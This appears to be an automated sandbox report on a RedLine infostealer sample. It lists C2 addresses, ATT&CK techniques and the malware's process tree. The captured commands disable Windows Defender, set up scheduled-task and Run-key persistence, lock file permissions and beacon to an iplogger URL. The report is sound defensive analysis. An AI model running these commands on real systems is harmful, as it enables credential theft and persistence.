redline | bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2023 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe
Size

1.1MB
MD5

1c68b4fd720cad4a8fdf31d431d652f6
SHA1

bef4e9e28c86aa8f9d4ecdac856b04396f5359c1
SHA256

bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304
SHA512

646f452bbb7585eee0a5e97904afbd45281068a89d9de0295cd15c5297b59b7aad76dc5563c15ce6eb4c04d8f6efe0be09fa185658da1650a41f92ea5139b59f
SSDEEP

24576:lyTm85cvY/OBFzY9QQHeer4/Q9NifIoDFAFP9RvRC:ACFbFs2QpraaNoIoD+FVR5

Score

10^/10

redline govnish luka terra discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

luka

185.161.248.75:4132

Attributes

auth_value
44560bcd37d6bf076da309730fdb519a

Extracted

Family

redline

Botnet

terra

185.161.248.75:4132

Attributes

auth_value
60df3f535f8aa4e264f78041983592d2

Extracted

Family

redline

Botnet

GOVNISH

94.142.138.219:20936

Attributes

auth_value
3724ec7b213c9f4bd81d275dd597a33d

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

o9063506.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	o9063506.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	o9063506.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	o9063506.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	o9063506.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	o9063506.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	o9063506.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

37 4936 powershell.exe
39 4936 powershell.exe
Downloads MZ/PE file

flow	pid	process
37	4936	powershell.exe
39	4936	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

legends.exebuild.exes5153444.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	legends.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	s5153444.exe

Executes dropped EXE 24 IoCs

Processes:

z7656109.exez4317422.exeo9063506.exep2796702.exer3731809.exer3731809.exer3731809.exes5153444.exes5153444.exes5153444.exelegends.exelegends.exelegends.exe20FKX1.exebuild.exeSTALKER-wix64winx32.exetor.exelegends.exetor.exelegends.exelegends.exetor.exelegends.exelegends.exe

pid	process
4972	z7656109.exe
3672	z4317422.exe
3796	o9063506.exe
4964	p2796702.exe
1084	r3731809.exe
5044	r3731809.exe
4648	r3731809.exe
2932	s5153444.exe
4108	s5153444.exe
1076	s5153444.exe
4904	legends.exe
4440	legends.exe
3472	legends.exe
3868	20FKX1.exe
1112	build.exe
3584	STALKER-wix64winx32.exe
1956	tor.exe
1892	legends.exe
2932	tor.exe
684	legends.exe
4976	legends.exe
1116	tor.exe
452	legends.exe
4880	legends.exe

Loads dropped DLL 2 IoCs

Processes:

20FKX1.exerundll32.exe

pid process

3868 20FKX1.exe
2264 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3868	20FKX1.exe
2264	rundll32.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

o9063506.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	o9063506.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	o9063506.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exez7656109.exez4317422.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	z7656109.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	z7656109.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	z4317422.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	z4317422.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

42 ip-api.com

flow	ioc
42	ip-api.com

Suspicious use of SetThreadContext 5 IoCs

Processes:

r3731809.exes5153444.exelegends.exelegends.exelegends.exe

description	pid	process	target process
PID 1084 set thread context of 4648	1084	r3731809.exe	r3731809.exe
PID 2932 set thread context of 1076	2932	s5153444.exe	s5153444.exe
PID 4904 set thread context of 3472	4904	legends.exe	legends.exe
PID 1892 set thread context of 684	1892	legends.exe	legends.exe
PID 4976 set thread context of 4880	4976	legends.exe	legends.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2664 4964 WerFault.exe p2796702.exe
3484 3564 WerFault.exe build.exe
1440 5028 WerFault.exe build.exe

pid	pid_target	process	target process
2664	4964	WerFault.exe	p2796702.exe
3484	3564	WerFault.exe	build.exe
1440	5028	WerFault.exe	build.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5028 schtasks.exe
1372 schtasks.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

740 PING.EXE

pid	process
5028	schtasks.exe
1372	schtasks.exe

pid	process
740	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

o9063506.exer3731809.exepowershell.exeSTALKER-wix64winx32.exebuild.exe

pid	process
3796	o9063506.exe
3796	o9063506.exe
4648	r3731809.exe
4648	r3731809.exe
4936	powershell.exe
4936	powershell.exe
3584	STALKER-wix64winx32.exe
3584	STALKER-wix64winx32.exe
3920	build.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

o9063506.exer3731809.exes5153444.exelegends.exer3731809.exepowershell.exebuild.exeSTALKER-wix64winx32.exebuild.exelegends.exebuild.exelegends.exe

description	pid	process
Token: SeDebugPrivilege	3796	o9063506.exe
Token: SeDebugPrivilege	1084	r3731809.exe
Token: SeDebugPrivilege	2932	s5153444.exe
Token: SeDebugPrivilege	4904	legends.exe
Token: SeDebugPrivilege	4648	r3731809.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	3920	build.exe
Token: SeDebugPrivilege	3584	STALKER-wix64winx32.exe
Token: SeDebugPrivilege	3564	build.exe
Token: SeDebugPrivilege	1892	legends.exe
Token: SeDebugPrivilege	5028	build.exe
Token: SeDebugPrivilege	4976	legends.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

s5153444.exe

pid process

1076 s5153444.exe

pid	process
1076	s5153444.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exez7656109.exez4317422.exer3731809.exes5153444.exes5153444.exelegends.exelegends.exe

description	pid	process	target process
PID 4420 wrote to memory of 4972	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	z7656109.exe
PID 4420 wrote to memory of 4972	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	z7656109.exe
PID 4420 wrote to memory of 4972	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	z7656109.exe
PID 4972 wrote to memory of 3672	4972	z7656109.exe	z4317422.exe
PID 4972 wrote to memory of 3672	4972	z7656109.exe	z4317422.exe
PID 4972 wrote to memory of 3672	4972	z7656109.exe	z4317422.exe
PID 3672 wrote to memory of 3796	3672	z4317422.exe	o9063506.exe
PID 3672 wrote to memory of 3796	3672	z4317422.exe	o9063506.exe
PID 3672 wrote to memory of 3796	3672	z4317422.exe	o9063506.exe
PID 3672 wrote to memory of 4964	3672	z4317422.exe	p2796702.exe
PID 3672 wrote to memory of 4964	3672	z4317422.exe	p2796702.exe
PID 3672 wrote to memory of 4964	3672	z4317422.exe	p2796702.exe
PID 4972 wrote to memory of 1084	4972	z7656109.exe	r3731809.exe
PID 4972 wrote to memory of 1084	4972	z7656109.exe	r3731809.exe
PID 4972 wrote to memory of 1084	4972	z7656109.exe	r3731809.exe
PID 1084 wrote to memory of 5044	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 5044	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 5044	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 5044	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 1084 wrote to memory of 4648	1084	r3731809.exe	r3731809.exe
PID 4420 wrote to memory of 2932	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	s5153444.exe
PID 4420 wrote to memory of 2932	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	s5153444.exe
PID 4420 wrote to memory of 2932	4420	bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe	s5153444.exe
PID 2932 wrote to memory of 4108	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 4108	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 4108	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 4108	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 2932 wrote to memory of 1076	2932	s5153444.exe	s5153444.exe
PID 1076 wrote to memory of 4904	1076	s5153444.exe	legends.exe
PID 1076 wrote to memory of 4904	1076	s5153444.exe	legends.exe
PID 1076 wrote to memory of 4904	1076	s5153444.exe	legends.exe
PID 4904 wrote to memory of 4440	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 4440	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 4440	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 4440	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 4904 wrote to memory of 3472	4904	legends.exe	legends.exe
PID 3472 wrote to memory of 5028	3472	legends.exe	schtasks.exe
PID 3472 wrote to memory of 5028	3472	legends.exe	schtasks.exe
PID 3472 wrote to memory of 5028	3472	legends.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe
"C:\Users\Admin\AppData\Local\Temp\bd1260616f7472d2f310cc65cb4701746b499d943a7a5fa4c01f7fe0a4ddc304.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4420

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7656109.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7656109.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4972

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z4317422.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z4317422.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3672

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o9063506.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o9063506.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p2796702.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p2796702.exe
4⤵
- Executes dropped EXE
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 928
5⤵
- Program crash
PID:2664

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
4⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r3731809.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
3⤵
- Executes dropped EXE
PID:4108

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s5153444.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
"C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4904

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
5⤵
- Executes dropped EXE
PID:4440

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3472

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legends.exe /TR "C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe" /F
6⤵
- Creates scheduled task(s)
PID:5028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legends.exe" /P "Admin:N"&&CACLS "legends.exe" /P "Admin:R" /E&&echo Y|CACLS "..\41bde21dc7" /P "Admin:N"&&CACLS "..\41bde21dc7" /P "Admin:R" /E&&Exit
6⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:4976

C:\Windows\SysWOW64\cacls.exe
CACLS "legends.exe" /P "Admin:N"
7⤵
PID:4868

C:\Windows\SysWOW64\cacls.exe
CACLS "legends.exe" /P "Admin:R" /E
7⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:3432

C:\Windows\SysWOW64\cacls.exe
CACLS "..\41bde21dc7" /P "Admin:N"
7⤵
PID:4144

C:\Windows\SysWOW64\cacls.exe
CACLS "..\41bde21dc7" /P "Admin:R" /E
7⤵
PID:1136

C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\20FKX1.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3868

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "build.exe" & start "" "STALKER-wix64winx32.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/10MJ2222q1"
7⤵
PID:2208

C:\Users\Admin\AppData\Local\Temp\build.exe
"build.exe"
8⤵
- Checks computer location settings
- Executes dropped EXE
PID:1112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "build" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\build.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe" &&START "" "C:\Users\Admin\AppData\Local\NET.Framework\build.exe"
9⤵
PID:1684

C:\Windows\system32\chcp.com
chcp 65001
10⤵
PID:1844

C:\Windows\system32\PING.EXE
ping 127.0.0.1
10⤵
- Runs ping.exe
PID:740

C:\Windows\system32\schtasks.exe
schtasks /create /tn "build" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\build.exe" /rl HIGHEST /f
10⤵
- Creates scheduled task(s)
PID:1372

C:\Users\Admin\AppData\Local\NET.Framework\build.exe
"C:\Users\Admin\AppData\Local\NET.Framework\build.exe"
10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\System32\tar.exe
"C:\Windows\System32\tar.exe" -xvzf "C:\Users\Admin\AppData\Local\Temp\tmp3420.tmp" -C "C:\Users\Admin\AppData\Local\82t5k7skbj"
11⤵
PID:1868

C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe
"C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\82t5k7skbj\torrc.txt"
11⤵
- Executes dropped EXE
PID:1956

C:\Users\Admin\AppData\Local\Temp\STALKER-wix64winx32.exe
"STALKER-wix64winx32.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/10MJ2222q1"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
6⤵
- Loads dropped DLL
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4964 -ip 4964
1⤵
PID:4728

C:\Users\Admin\AppData\Local\NET.Framework\build.exe
C:\Users\Admin\AppData\Local\NET.Framework\build.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe
"C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\82t5k7skbj\torrc.txt"
2⤵
- Executes dropped EXE
PID:2932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3564 -s 1648
2⤵
- Program crash
PID:3484

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1892

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
2⤵
- Executes dropped EXE
PID:684

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 3564 -ip 3564
1⤵
PID:3940

C:\Users\Admin\AppData\Local\NET.Framework\build.exe
C:\Users\Admin\AppData\Local\NET.Framework\build.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe
"C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\82t5k7skbj\torrc.txt"
2⤵
- Executes dropped EXE
PID:1116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5028 -s 1656
2⤵
- Program crash
PID:1440

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
2⤵
- Executes dropped EXE
PID:452

C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe
2⤵
- Executes dropped EXE
PID:4880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5028 -ip 5028
1⤵
PID:1764

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\82t5k7skbj\data\cached-microdescs.new
Filesize
5.3MB

MD5
f29ad448783e68a8cf001d711a4e0baa

SHA1
ddc5bfce82a115af3d8122e1f7b49f37fe57e7aa

SHA256
3b9181f0b026cba6dd4fa28d41c1f702a446068542191db720fb0fc024007b0b

SHA512
c8fce0cfc4859c4c8914558e034c2afa275d92fca59cbd72140df29aba9bda7a46582694db39f9a6b543aaa96510b15c10576bb184fd0d7dd7c3dec5c2b1bfcf

Download Submit
C:\Users\Admin\AppData\Local\82t5k7skbj\data\unverified-microdesc-consensus
Filesize
2.3MB

MD5
bed45018f4236cf5727bcc28a92d6a4c

SHA1
16a4dfd8fe2d219743dd1705747875969a9bad9d

SHA256
228a4b45b0e7765a28e9eeca59b501c82bceb143dd35b39f9a54c0c3d6f2d850

SHA512
3a6d74e104edcc1e69ad849be640d8bf2ac1747204922e39a3d485f61a20e37a0bacb433db0a6c65a1f0c12c69305106150936cdacb0fe99cbe5a941e507573b

Download Submit
C:\Users\Admin\AppData\Local\82t5k7skbj\host\hostname
Filesize
64B

MD5
59b9fc964a7fb35b5673a818fd1ebf03

SHA1
6598e89a5bafd449542f85cc47b761e360a8184b

SHA256
f5028e44a74cf9f736b5cffef5cefdbfc56f5ebef29e0571dc688121ed667da4

SHA512
dd689ef4e0221afce14908926167d670228c0daa00f19f2e342665de47c5533e6c38559bc959b58e38b0f502f86c5ca3852c5b72420afaf5e947552c5e9d1300

Download Submit
C:\Users\Admin\AppData\Local\82t5k7skbj\port.dat
Filesize
4B

MD5
358f9e7be09177c17d0d17ff73584307

SHA1
99ee1e4899976b59849a8b0a2696370e9a997814

SHA256
3191ffaa05e8a18a1da8d6b8b84b58eb0ed465466b9555bd738c5bc81d990ba4

SHA512
65c0213f93ea31f8f6ba15e745fc805b928ac546d74cbf087c1905b695e3f8d8e7cf7f1866222ddc48a5d2a3e80ec7dabe45022d78e9860d2698220c63752d27

Download Submit
C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe
Filesize
7.4MB

MD5
88590909765350c0d70c6c34b1f31dd2

SHA1
129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7

SHA256
46fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82

SHA512
a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192

Download Submit
C:\Users\Admin\AppData\Local\82t5k7skbj\tor\tor.exe
Filesize
7.4MB

MD5
88590909765350c0d70c6c34b1f31dd2

SHA1
129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7

SHA256
46fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82

SHA512
